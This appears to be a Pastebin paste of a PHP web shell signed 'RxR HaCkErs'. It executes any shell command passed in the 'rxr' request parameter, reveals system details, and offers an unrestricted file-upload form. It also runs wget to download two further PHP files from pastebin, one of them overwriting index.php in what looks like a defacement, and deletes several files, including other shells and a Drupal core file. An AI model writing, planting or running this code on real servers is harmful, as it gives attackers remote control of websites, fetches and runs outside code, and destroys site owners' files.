Advertisement
Guest User

Untitled

a guest
Apr 23rd, 2018
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.00 KB | None | 0 0
  1. <? $cmd = $_REQUEST["rxr"];?>
  2. <? if($cmd != "") print Shell_Exec($cmd);?>
  3.  
  4. <?php echo 'RxR HaCkErs'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>
  5.  
  6. <?php
  7.  
  8.  
  9. $index = exec('wget -O king.php "https://pastebin.com/raw/6WAXBbnf"');
  10. $index1 = exec('wget -O index.php "https://pastebin.com/raw/gvM45KfS"');
  11.  
  12. unlink('s.php');
  13. unlink('w.php');
  14. unlink('payload.php');
  15. unlink('izom.php');
  16. unlink('sites/sh.php');
  17. unlink('modules/user/user.pages.inc');
  18. echo $index,$index1;
  19. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement